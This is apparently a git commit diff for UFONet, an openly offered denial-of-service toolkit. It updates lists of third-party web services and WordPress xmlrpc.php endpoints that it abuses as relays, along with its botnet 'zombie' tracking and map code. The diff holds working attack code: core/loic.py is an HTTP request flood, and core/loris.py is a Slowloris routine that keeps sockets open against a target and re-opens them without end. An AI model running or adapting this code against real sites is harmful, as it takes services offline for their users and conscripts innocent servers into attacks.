Browse Source

release v1.2 - Armageddon

psy 5 years ago
parent
commit
aafcd2a878

+ 0 - 98
README.md

@@ -1,98 +0,0 @@
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-welcome_small.png "UFONet Welcome")
-
-----------
-
- + Web:  https://ufonet.03c8.net
-
-----------
-
- + FAQ:  https://ufonet.03c8.net/FAQ.html
-
-----------
-
-  UFONet - is a toolkit designed to launch DDoS and DoS attacks.
-
-  See these links for more info:
-
-   - CWE-601:Open Redirect: 
-     https://cwe.mitre.org/data/definitions/601.html
-
-   - OWASP:URL Redirector Abuse: 
-     https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-schema.png "UFONet Schema")
-
-----------
-
-#### Installing:
-
-  UFONet runs on many platforms.  It requires Python (>2.7.9) and the following libraries:
-
-       python-pycurl - Python bindings to libcurl
-       python-geoip  - Python bindings for the GeoIP IP-to-country resolver library
-       python-whois  - Python module for retrieving WHOIS information - Python 2
-       python-crypto - Cryptographic algorithms and protocols for Python
-       python-requests - elegant and simple HTTP library for Python2, built for human beings
-       python-scapy - Packet generator/sniffer and network scanner/discovery
-
-  You can automatically get all required libraries using:
-
-       python setup.py install
-
-  For manual installation, on Debian-based systems (ex: Ubuntu), run: 
-
-       sudo apt-get install python-pycurl python-geoip python-whois python-crypto python-requests python-scapy
-
-  On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
-
-       pip install geoip 
-       pip install requests
-       pip install pycrypto
-
-####  Source libs:
-
-   * Python: https://www.python.org/downloads/
-   * PyCurl: http://pycurl.sourceforge.net/
-   * PyGeoIP: https://pypi.python.org/pypi/GeoIP/
-   * PyWhois: https://pypi.python.org/pypi/whois
-   * PyCrypto: https://pypi.python.org/pypi/pycrypto
-   * PyRequests: https://pypi.python.org/pypi/requests
-   * PyScapy: https://pypi.org/project/scapy/
-   * Leaflet: http://leafletjs.com/ (provided)
-
-----------
-
-####  License:
-
-  UFONet is released under the GPLv3. You can find the full license text
-in the [LICENSE](./docs/LICENSE) file.
-
-----------
-
-####  Screenshots (current version!):
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-shell1_small.png "UFONet Shell")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-shell2_small.png "UFONet GUI Shell")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-welcome_small.png "UFONet GUI Welcome")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-main_small.png "UFONet GUI Main Panel")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-botnet_small.png "UFONet GUI Botnet")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-stats_small.png "UFONet GUI General Stats")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-board_small.png "UFONet GUI Board/Forum")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-grid_small.png "UFONet GUI Grid")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-grid2_small.png "UFONet GUI Grid Stats")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-wargames_small.png "UFONet GUI Wargames")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-hydra-attack_small.png "UFONet GUI Attack")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-gui3_small.png "UFONet GeoMap /deploying/")
-
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-gui4_small.png "UFONet GeoMap /attacking/")

+ 1 - 1
botnet/aliens.txt

@@ -1 +1 @@
-https://api.loadimpact.com/v3/anonymous-test-runs;$POST;url
+https://gtmetrix.com/analyze.html;$POST;url

+ 1 - 1
botnet/rpcs.txt

@@ -1 +1 @@
-http://heightsmedia.com/xmlrpc.php
+https://heightsmedia.com/xmlrpc.php

+ 1 - 0
botnet/ucavs.txt

@@ -1 +1,2 @@
 https://downforeveryoneorjustme.com/
+https://website-down.com/

+ 2 - 2
core/__init__.py

@@ -1,7 +1,7 @@
-#!/usr/bin/env python 
+#!/usr/bin/env python
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51

+ 80 - 69
core/ajaxmap.py

@@ -7,35 +7,39 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket, threading, re, base64, os, time
-import webbrowser, subprocess, urllib2, json, sys
+import socket, threading, re, base64, os, time, base64, traceback
+import webbrowser, subprocess, urllib2, json, sys, shlex
 from urlparse import urlparse
 from main import UFONet
-import base64, traceback
 
 try:
     import pygeoip
 except:
-    print "\nError importing: pygeoip lib. \n\n On Debian based systems:\n\n $ 'sudo apt-get install python-geoip' or 'pip install geoip')\n"
+    print "\n[Error] [AI] Cannot import lib: pygeoip. \n\n To install it try:\n\n $ 'sudo apt-get install python-geoip' or 'pip install geoip'\n"
     sys.exit(2)
 
 class AjaxMap(object):
     def __init__(self):
+        self.geo_db_mirror1 = 'http://176.28.23.46/bordercheck/maps.tar.gz'  # Turina Server
+        self.geo_db_mirror2 = 'http://83.163.232.95/bordercheck/maps.tar.gz' # Mirror
         self._geoip=None
         self._geoasn=None
         self._geoipstatus='nomap'
         self._err=''
         ufonet = UFONet()
         ufonet.create_options()
-        self.zombies = ufonet.extract_zombies()
-        aliens_army = ufonet.extract_aliens()
-        droids_army = ufonet.extract_droids()
-        ucavs_army = ufonet.extract_ucavs()
-        rpcs_army = ufonet.extract_rpcs()
-        self.zombies.extend(aliens_army)
-        self.zombies.extend(droids_army)
-        self.zombies.extend(ucavs_army)
-        self.zombies.extend(rpcs_army)
+        try:
+            self.zombies = ufonet.extract_zombies()
+            aliens_army = ufonet.extract_aliens()
+            droids_army = ufonet.extract_droids()
+            ucavs_army = ufonet.extract_ucavs()
+            rpcs_army = ufonet.extract_rpcs()
+            self.zombies.extend(aliens_army)
+            self.zombies.extend(droids_army)
+            self.zombies.extend(ucavs_army)
+            self.zombies.extend(rpcs_army)
+        except:
+            return
 
     def get_err(self):
         return self._err
@@ -48,8 +52,7 @@ class AjaxMap(object):
                 f=open("maps.downloadmsg","wb")
                 f.write("")
                 f.close()
-                print "[Info] GUI: GeoIP data download started..."
-                print "[Info] GUI: If this message persists: remove 'maps.downloading' and 'maps' folder, then restart ufonet...\n"
+                print "[Info] [AI] [Control] GeoIP data download started! -> [OK!]\n"
             self._geoipstatus='downloading'
         elif os.path.isdir('maps'):
             if self._geoip == None :
@@ -75,7 +78,6 @@ class AjaxMap(object):
 	    traceback.print_exc()
 
     def download_maps(self):
-        import subprocess, shlex
         # generate geolocation values on a map
         if self.get_status() != 'nomap':
             return self._geoipstatus == 'ok'
@@ -85,23 +87,20 @@ class AjaxMap(object):
         f.write("download started<script>$'('#ufomsg').load('/js/ajax.js?fetchmap=')")
         f.close()
         self._geoipstatus="downloading"
-        # download maps folder
-        geo_db_mirror1 = 'http://176.28.23.46/bordercheck/maps.tar.gz'  # Turina Server
-        geo_db_mirror2 = 'http://83.163.232.95/bordercheck/maps.tar.gz' # Mirror
         try: # mirror 1
-            print "\n[Info] - Fetching maps from 'Mirror 1':", geo_db_mirror1 + "\n"
-            response = self.retrieve(geo_db_mirror1, 'maps.tar.gz')
+            print "\n[Info] [AI] Fetching maps from 'Mirror 1':", self.geo_db_mirror1 + "\n"
+            response = self.retrieve(self.geo_db_mirror1, 'maps.tar.gz')
         except:
             try: # mirror 2
-                print "[Error] - Mirror 1':", geo_db_mirror1 + " Failed!\n"
-                print "[Info] - Fetching maps from 'Mirror 2':", geo_db_mirror2 + "\n"
-                response = self.retrieve(geo_db_mirror2, 'maps.tar.gz')
+                print "[Error] [AI] Mirror 1':", self.geo_db_mirror1 + " Failed! -> [Discarding!]\n"
+                print "[Info] [AI] Fetching maps from 'Mirror 2':", self.geo_db_mirror2 + "\n"
+                response = self.retrieve(self.geo_db_mirror2, 'maps.tar.gz')
             except:
-                print("[Error] - Something wrong fetching maps from mirrors ...Aborting!"), "\n"
+                print("[Error] [AI] Something wrong fetching maps from mirrors! -> [Aborting!]"), "\n"
 		traceback.print_exc()
                 return False #sys.exit(2)
         subprocess.call(shlex.split('tar zxfv maps.tar.gz'))
-        print "\n[Info] GeoIP maps and databases: ready!\n"
+        print "\n[Info] [AI] [Control] GeoIP maps and databases -> [OK!]\n"
         # set pygeoip data sources
         self._geoip = pygeoip.GeoIP('maps/GeoLiteCity.dat')
         self._geoasn = pygeoip.GeoIP('maps/GeoIPASNum.dat')
@@ -115,17 +114,17 @@ class AjaxMap(object):
         # check for status, downloading is done by ajax() method
         if self.get_status() != 'ok':
             if self._geoipstatus =='downloading':
-                print "\n[Info] GeoIP maps and databases: downloading\n"
-	        self._err= "ufomsg('Downloading maps...')"
+                print "\n[Info] [AI] [Control] GeoIP maps and databases -> [Downloading!]\n"
+	        self._err= "ufomsg('[Info] [AI] Downloading maps... -> [Waiting!]')"
             elif not os.path.exists('maps/GeoIPASNum.dat') or not os.path.exists('maps/GeoLiteCity.dat'):
-                print "\n[Info] GeoIP maps and databases: download starting!\n"
-                self._err= "ufomsg('[Info] Map download starting')\n$('#ufomsg').load('/js/ajax.js?fetchgeoip=')"
+                print "\n[Info] [AI] GeoIP maps and databases -> [Starting!]\n"
+                self._err= "ufomsg('[Info] [AI] Map download starting')\n$('#ufomsg').load('/js/ajax.js?fetchgeoip=')"
             else:
-                print "\n[Info] GeoIP maps and databases: unknown error\n"
-                self._err= "ufomsg('<font color='red'>[Info]</font> Maps: unknown error...')"
+                print "\n[Error] [AI] GeoIP maps and databases: FAILED! -> [Discarding!]\n"
+                self._err= "ufomsg('<font color='red'>[Info] [AI]</font> Maps: unknown error -> [Discarding!]')"
             return None
         if re.match(r'^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^10\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^192.168\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^172.(1[6-9]|2[0-9]|3[0-1]).[0-9]{1,3}.[0-9]{1,3}$', zombie) or re.match('localhost', zombie):
-            self._err= "ufomsg('<font color='red'>[Info]</font> Maps: invalid ip data...')"
+            self._err= "ufomsg('<font color='red'>[Info] [AI] [Control]</font> Maps: invalid ip data -> [Discarding!]')"
             return None
         # create geoip data skeleton
         geo_zombie={}
@@ -144,39 +143,50 @@ class AjaxMap(object):
         try:
             ip = socket.gethostbyname(url.netloc)
         except:
-            self._err= "ufomsg('<font color='yellow'>[Info]</font> GeoIP: hostbyname failed for "+str(url.netloc)+"...')"
-            return None
-        if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
-            geo_zombie['ip'] = ip
             try:
-                record = self._geoip.record_by_addr(ip)
+                import dns.resolver
+                r = dns.resolver.Resolver()
+                r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                a = r.query(url.netloc, "A") # A record
+                for rd in a:
+                    ip = str(rd)
             except:
-                self._err= "ufomsg('<font color='yellow'>[Info]</font> GeoIP: lookup failed for "+ip+", page reload required...')"
+                self._err= "ufomsg('<font color='yellow'>[Error] [AI]</font> GeoIP: hostbyname failed for "+str(url.netloc)+"...')"
                 return None
-            try:
-                asn = self._geoasn.org_by_addr(ip)
-                if asn is not None:
-                    geo_zombie['asn'] = asn.encode('utf-8')
-            except:
-                geo_zombie['asn'] = 'No ASN provided'
-            try:
-                geo_zombie['host_name'] = socket.gethostbyaddr(ip)[0].encode('utf-8')
-            except:
-                geo_zombie['host_name'] = 'No hostname'
-            try:
-                longitude = str(float(record['longitude']))
-                geo_zombie['longitude'] = longitude
-                latitude = str(float(record['latitude']))
-                geo_zombie['latitude'] = latitude
-            except:
-                pass
-            try:
-                geo_zombie['country'] = record["country_name"].encode('utf-8')
-                geo_zombie['country_code'] = record["country_code"].lower().encode('utf-8')
-                if record['city'] is not None:
-                    geo_zombie['city'] = record["city"].encode('utf-8')
-            except:
-                pass
+        if ip:
+            if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
+                geo_zombie['ip'] = ip
+                try:
+                    record = self._geoip.record_by_addr(ip)
+                except:
+                    self._err= "ufomsg('<font color='yellow'>[Error] [AI] </font> GeoIP: lookup failed for "+ip+", page reload required...')"
+                    return None
+                try:
+                    asn = self._geoasn.org_by_addr(ip)
+                    if asn is not None:
+                        geo_zombie['asn'] = asn.encode('utf-8')
+                except:
+                    geo_zombie['asn'] = 'No ASN provided'
+                try:
+                    geo_zombie['host_name'] = socket.gethostbyaddr(ip)[0].encode('utf-8')
+                except:
+                    geo_zombie['host_name'] = 'No hostname'
+                try:
+                    longitude = str(float(record['longitude']))
+                    geo_zombie['longitude'] = longitude
+                    latitude = str(float(record['latitude']))
+                    geo_zombie['latitude'] = latitude
+                except:
+                    pass
+                try:
+                    geo_zombie['country'] = record["country_name"].encode('utf-8')
+                    geo_zombie['country_code'] = record["country_code"].lower().encode('utf-8')
+                    if record['city'] is not None:
+                        geo_zombie['city'] = record["city"].encode('utf-8')
+                except:
+                    pass
+        else:
+            geo_zombie = None
         return geo_zombie
 
     # generates javascript for adding a new zombie with geoip data
@@ -186,7 +196,8 @@ class AjaxMap(object):
         if gz is not None and gz['latitude']!= '-':
             ret = "Zombies.add('"+z+"',Array(new L.LatLng("+str(gz['latitude'])+","+str(gz['longitude'])+"),'"+gz['city']+"','"+gz['country']+"','"+gz['country_code']+"','"+gz['asn']+"','"+gz['ip']+"','"+gz['host_name']+"'))\n"
         else:
-            #print 'geozombie dead : ',z
+            url = urlparse(z)
+            print '[Error] [AI] [Control] [GUI]',url.netloc, "isn't geolocated on [Map] -> [Discarding!]"
             ret += "dead_zombies.push('"+z+"')\n"
         ret += "last_zombie = '"+z+"'\n"
         return ret
@@ -208,14 +219,14 @@ class AjaxMap(object):
         if 'fetchgeoip' in pGet.keys():
             if self.get_status() == "nomap":
                 self.download_maps()
-                return "[Info] Geoip data download done!<br/>"
+                return "[Info] [AI] [Control] Geoip data download! -> [OK!]<br/>"
         if 'stats' in pGet.keys():
             stat='<script>$(".ufo_stat_div").show()</script>'
             if os.path.exists('/tmp/ufonet.html'):
                 for x in open(r'/tmp/ufonet.html').readlines():
                     stat = stat + x
             else:
-                stat="<i>[Info] Waiting for statistics generation...</i>"
+                stat="<i>[Info] [AI] [Control] Generating statistics... -> [Waiting!]</i>"
             return stat+"</div>"
         if self.get_status() != "ok":
             dljs=""
@@ -224,7 +235,7 @@ class AjaxMap(object):
             if 'doll' in pGet.keys():
                 dljs+="$('#ufomsg').load('/js/ajax.js?fetchdoll="+pGet['doll']+"')\n"
                 dljs+="doll=new Doll('"+pGet["doll"]+"')\n"
-            return "[Info] GeoIP data download in progress...<br><i>see console for errors</i>+<script>"+dljs+"</script>"
+            return "[Info] [AI] GeoIP data download in progress...<br><i>See console for errors</i>+<script>"+dljs+"</script>"
         if 'zombie' in pGet.keys():
             zn=base64.b64decode(pGet['zombie'])
             nzn=self.get_next_zombie(zn)
@@ -232,10 +243,10 @@ class AjaxMap(object):
                 zombie=self.get_js(nzn)
                 return """ <script>
                 """+zombie+"""
-                ufomsg('[Info] Adding zombie: """+nzn+"""...')
+                ufomsg('[Info] [AI] [Control] Adding zombie: """+nzn+"""...')
                 </script>"""
             else:
-                return "<script>zdone=true\nufomsg('[Info] All zombies deployed!...')\n </script>\n"
+                return "<script>zdone=true\nufomsg('[Info] [AI] [Control] All zombies deployed! -> [OK!]')\n </script>\n"
         if 'fetchdoll' in pGet.keys():
             tn=pGet['fetchdoll']
             target = self.geo_ip(tn)

+ 32 - 27
core/herd.py

@@ -7,11 +7,11 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket, threading, logging, datetime
-import zombie
-import sys, os, re
+import socket, threading, logging, datetime, sys, os, re, time
 from urlparse import urlparse
 
+import zombie
+
 # zombie tracking class
 class Herd(object):
     # basic constructor
@@ -47,7 +47,7 @@ class Herd(object):
         except:
             pass
 
-    # got a new one !
+    # got a new one!
     def new_zombie(self, zombie):
         self.total_connections+=1
         if zombie not in self.stats:
@@ -85,11 +85,9 @@ class Herd(object):
         options = self.ufonet.options
         if options.verbose == True:
             if ac>self.living:
-                print "[Control] Active zombies:", ac-self.living, ", waiting for them to return..."
-            else:
-                print "="*41
-                print "\n[Control] All zombies returned to the master ;-)"
-                print "-"*21
+                if ac-self.living not in self.ufonet.ac_control:
+                    print "[Info] [AI] [Control] Active [ARMY] returning from the combat front: "+ str(ac-self.living)
+                    self.ufonet.ac_control.append(ac-self.living)
         with self.lock:
             return ac==self.living
 
@@ -114,8 +112,11 @@ class Herd(object):
         buf=""
         out=self.get_stat()
         if os.path.exists("/tmp/ufonet.html.tmp"):
-            print 'tmp file found, html output abort !!!'
-            return
+            try:
+                self.cleanup()
+            except:
+                print '[Info] Previous tmp file found... html content will not be updated.'
+                pass
         buf += "<div>" + os.linesep
         if out['err'] is not None:
             buf += "<div>Errors : <br/>"+str(out['err'])+'</div>'+os.linesep
@@ -144,23 +145,26 @@ class Herd(object):
         buf += "<div><h3>Troops: </h3></div>"+os.linesep
         buf += "<div>Aliens: " + str(self.ufonet.total_aliens) + " | Hits: " + str(self.ufonet.aliens_hit) + " | Fails: " + str(self.ufonet.aliens_fail)+"</div>" + os.linesep
         buf += "<div>Droids: " + str(self.ufonet.total_droids) + " | Hits: " + str(self.ufonet.droids_hit) + " | Fails: " + str(self.ufonet.droids_fail)+"</div>" + os.linesep
+        buf += "<div>X-RPCs: " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)+"</div>" + os.linesep
         buf += "<div>UCAVs: " + str(self.ufonet.total_ucavs) + " | Hits: " + str(self.ufonet.ucavs_hit) + " | Fails: " + str(self.ufonet.ucavs_fail)+"</div>" + os.linesep
-        buf += "<div>XRPCs: " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)+"</div>" + os.linesep
         f = open("/tmp/ufonet.html.tmp", "w") 
         f.write(buf)
         if(final):
             f.write("<script>hdone=true</script>")
         f.close()
-        os.rename("/tmp/ufonet.html.tmp","/tmp/ufonet.html")
+        try:
+            os.rename("/tmp/ufonet.html.tmp","/tmp/ufonet.html")
+        except:
+            pass
 
     # generate statistics for stdout
     def format(self, out):
+        if len(out['data'])==0:
+            print "[Info] Not any feedback data to show. Exiting..."
+            return
         print '='*42
         print "Herd statistics"
         print "="*42
-        if len(out['data'])==0:
-            print "\n[Error] Something wrong retrieving data feedback. Executing evasion routine!"
-            return
         for zo in out['data']:
             z=out['data'][zo]
             print 'Zombie :', z['name'], " | ", z['hits'], " hits ", z['fails'] ," fails ", z['retries'], " retries "
@@ -174,7 +178,7 @@ class Herd(object):
             print "="*80
             print "Worst zombie: ", out['max_failz'], " with ", out['max_fails'], " fails"
         print "="*80
-        print "Total invocations:", self.total_connections,"| Zombies:", len(self.stats),"| Hits:", self.total_hits,"| Fails:", self.total_fails
+        print "Total invocations:", self.total_connections,"| Zombies:", str(self.ufonet.total_zombie),"| Hits:", self.total_hits,"| Fails:", self.total_fails
         print "Total time:", out['total_time'], "| Avg time:", out['avg_time']
         print "Total size:", out['total_size'],"| Avg size:", out['avg_size']
         print "-"*21
@@ -183,8 +187,8 @@ class Herd(object):
         print "="*42
         print "Aliens: " + str(self.ufonet.total_aliens) + " | Hits: " + str(self.ufonet.aliens_hit) + " | Fails: " + str(self.ufonet.aliens_fail)
         print "Droids: " + str(self.ufonet.total_droids) + " | Hits: " + str(self.ufonet.droids_hit) + " | Fails: " + str(self.ufonet.droids_fail)
+        print "X-RPCs: " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)
         print "UCAVs : " + str(self.ufonet.total_ucavs) + " | Hits: " + str(self.ufonet.ucavs_hit) + " | Fails: " + str(self.ufonet.ucavs_fail)
-        print "XRPCs : " + str(self.ufonet.total_rpcs) + " | Hits: " + str(self.ufonet.rpcs_hit) + " | Fails: " + str(self.ufonet.rpcs_fail)
         print "-"*21
         print "\n" # gui related
         print '='*21
@@ -194,13 +198,13 @@ class Herd(object):
         data={}
         out={'err':None,"header":"","data":{},"total":{},"footer":"",'max_fails':0,'max_failz':"",'max_hits':0,'max_hitz':""}
         if os.path.exists("html.tmp"):
-            out['err']= "tmp file found"
+            out['err']= "\n[Info] Previous tmp file found... html content will not be updated."
             return out
         if self.total_connections==0:
-            out['err']= "No herd without zombies"
+            out['err']= "\n[Error] No herd without zombies..."
             return out
         if len(self.stats)==0:
-            out['err']=  "No statistics available"
+            out['err']=  "\n[Error] No statistics available..."
             return out
         self.zero_fails = 0
         for zombie_stat in self.stats:
@@ -208,7 +212,7 @@ class Herd(object):
             try:
                 entry={'name':zombie_stat,"hits":0,"fails":0,"retries":0,"time":0,"max_time":0,"min_time":zs[0][1],"avg_time":0,"size":0,"max_size":0,"min_size":zs[0][2],"avg_size":0}
             except:
-                out['err']=  "No statistics available\n"
+                out['err']=  "\n[Error] No statistics available...\n"
                 return out
             if len(zs)==0:
                 continue
@@ -217,8 +221,11 @@ class Herd(object):
                     entry['hits']+=1
                 else:
                     entry['fails']+=1
-                if self.connection[zombie_stat]:
-                    entry['retries']+=1
+                try:
+                    if self.connection[zombie_stat]:
+                        entry['retries']+=1
+                except:
+                    entry['retries']=entry['retries'] # black magic!
                 entry['time']+=line[1]
                 if line[1]>entry['max_time']: 
                     entry['max_time']=line[1]
@@ -260,8 +267,6 @@ class Herd(object):
     # wrapper
     def dump(self):
         out=self.get_stat()
-        if out['err'] is not None:
-            print "[Error] "+out['err']
         self.format(out)
 
     def list_fails(self):
@@ -272,7 +277,7 @@ class Herd(object):
             return
         if not options.forceyes:
             print '-'*25
-            update_reply = raw_input("Want to update your army (Y/n)")
+            update_reply = raw_input("Do you want to update your army (Y/n)")
             print '-'*25
         else:
             update_reply = "Y"

File diff suppressed because it is too large
+ 1 - 1
core/js/jquery-1.10.2.min.js


+ 3 - 3
core/js/ufo.js

@@ -1,5 +1,5 @@
 /*
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
@@ -352,7 +352,7 @@ function ufowatch(){
 		    label=total_zombies -dead_zombies.length
 		    $('.ufo_error_div').html('<div id="ufo_error_div">To be discarded : <br/><ul>'
 					     +dead_zombies.join("<li> -")+'</ul></div>')
-		    error = "<a href='#' onclick='show_error()'> + "+dead_zombies.length+" to be discarded...</a>"
+		    error = "<a href='#' onclick='show_error()'> + "+dead_zombies.length+" not listed...</a>"
 		}
 	    }
 	$(".ufo_title_div").html('<div id="status"><center><h2><font color="red">Zombies:</font></h2><h3><font color="green" size="9px"><b>'+label+'</b></font></h3>'+error+'</center></div>');
@@ -390,7 +390,7 @@ function initMap (targetdoll=false) {
     new L.Control.Zoom({position: 'topright'}).addTo(map)
     map.scrollWheelZoom.disable()
     map.addControl(new UfoControlClass())
-    $('.ufo_msg_div').html("<h2 style='text-align:right'>Map Console <a href=\"#\" id='showMsg'>[+]</a> <a href=\"#\" id='hideMsg'>[-]</a></h2><div id='ufomsg'>[Info] Locating zombies. Please wait...<br/><br/></div><div id='ufomsg_last'>[Info] Locating zombies. Please wait...<br/></div>")
+    $('.ufo_msg_div').html("<h2 style='text-align:right'>Map Console <a href=\"#\" id='showMsg'>[+]</a> <a href=\"#\" id='hideMsg'>[-]</a></h2><div id='ufomsg'>[Info] [AI] [Control] Locating zombies... -> [Waiting!]<br/><br/></div><div id='ufomsg_last'>[Info] [AI] [Control] Locating zombies.... -> [Waiting!]<br/></div>")
     map.addControl(new UfoTitleClass())
     $(".ufo_title_div").html('<div id="status"><h2><font color="red">Zombies:</font></h2><center><h3><font color="green" size="9px"><b>'+total_zombies+'</b></font></h3></center></div>');
     map.addControl(new UfoErrorClass())

File diff suppressed because it is too large
+ 1538 - 780
core/main.py


+ 9 - 0
core/mods/__init__.py

@@ -0,0 +1,9 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 13 - 7
core/loic.py

@@ -7,9 +7,15 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import requests, random
-from requests.packages.urllib3.exceptions import InsecureRequestWarning # black magic
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import sys, random
+
+try:
+    import requests
+    from requests.packages.urllib3.exceptions import InsecureRequestWarning # black magic
+    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+except:
+    print "\nError importing: requests lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-requests' or 'pip install requests'\n"
+    sys.exit(2)
 
 # UFONet DoS Web LOIC (Low Orbit Ion Cannon)
 def ionize(self, target, rounds, proxy):
@@ -24,11 +30,11 @@ def ionize(self, target, rounds, proxy):
             headers = {'User-Agent': str(self.user_agent)}
             try:
                 r = requests.get(target, headers=headers, proxies=proxyD, verify=False)
-                print "[Info] LOIC: Firing 'pulse' ["+str(n)+"] -> Status: HIT!"
+                print "[Info] [AI] [LOIC] Firing 'pulse' ["+str(n)+"] -> [HIT!]"
             except:
-                print "[Error] LOIC: Failed to engage with 'pulse' ["+str(n)+"]"
+                print "[Error] [AI] LOIC: Failed to engage with 'pulse' ["+str(n)+"]"
     except:
-        print("[Error] LOIC: Failing to engage. Is still target online?...")
+        print("[Error] [AI] [LOIC] Failing to engage... -> Is still target online? -> [Checking!]")
 
 class LOIC(object):
     def __init__(self):
@@ -41,5 +47,5 @@ class LOIC(object):
             self.agents.append(agent)
 
     def attacking(self, target, rounds, proxy):
-        print "\n[Info] Low Orbit Ion Cannon (LOIC) is ready to fire: [" , rounds, "pulses ]"
+        print "\n[Info] [AI] Low Orbit Ion Cannon (LOIC) is ready to fire: [" , rounds, "pulses ]"
         ionize(self, target, rounds, proxy) # attack with LOIC using threading

+ 46 - 22
core/loris.py

@@ -7,7 +7,7 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket, random, ssl, re
+import socket, random, ssl, re, urlparse
 
 # UFONet Slow HTTP requests (LORIS)
 def setupSocket(self, ip):
@@ -37,32 +37,47 @@ def setupSocket(self, ip):
         if "Location:" in l:
             try:
                 ip = re.findall('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', l)[0] # extract new redirect url
-                ip = socket.gethostbyname(ip)
+                try:
+                    ip = socket.gethostbyname(ip)
+                except:
+                   try:
+                       import dns.resolver
+                       r = dns.resolver.Resolver()
+                       r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
+                       url = urlparse(ip)
+                       a = r.query(url.netloc, "A") # A record
+                       for rd in a:
+                           ip = str(rd)
+                   except:
+                       ip = target
             except:
                 pass
     return sock, ip
 
 def tractor(self, ip, requests): 
     n=0
-    for i in range(requests): 
-        n=n+1
-        try:
-            sock, ip = setupSocket(self, ip)
-            print "[Info] LORIS: Firing 'tractor beam' ["+str(n)+"] -> Status: CONNECTED! (Keeping socket open in time...)"
-        except:
-            print "[Error] LORIS: Failed to engage with 'tractor beam' ["+str(n)+"]"
-        self.sockets.append(sock)
-    while True: # try to abuse HTTP Headers
-        for sock in list(self.sockets):
-            try: 
+    try:
+        for i in range(requests): 
+            n=n+1
+            try:
                 sock, ip = setupSocket(self, ip)
-            except socket.error:
-                self.sockets.remove(sock)
-        for i in range(requests - len(self.sockets)):
-            print("[Info] LORIS: Re-opening closed 'tractor beam' -> Status: RE-LINKED!")
-            sock, ip = setupSocket(self, ip)
-            if sock:
-                self.sockets.append(sock)
+                print "[Info] [AI] [LORIS] Firing 'tractor beam' ["+str(n)+"] -> [CONNECTED!]"
+            except:
+                print "[Error] [AI] [LORIS] Failed to engage with 'tractor beam' ["+str(n)+"]"
+            self.sockets.append(sock)
+        while True: # try to abuse HTTP Headers
+            for sock in list(self.sockets):
+                try: 
+                    sock, ip = setupSocket(self, ip)
+                except socket.error:
+                    self.sockets.remove(sock)
+            for i in range(requests - len(self.sockets)):
+                print("[Info] [AI] [LORIS] Re-opening closed 'tractor beam' -> [RE-LINKED!]")
+                sock, ip = setupSocket(self, ip)
+                if sock:
+                    self.sockets.append(sock)
+    except:
+        print("[Error] [AI] [LORIS] Failing to engage... -> Is still target online? -> [Checking!]")
 
 class LORIS(object):
     def __init__(self):
@@ -77,9 +92,18 @@ class LORIS(object):
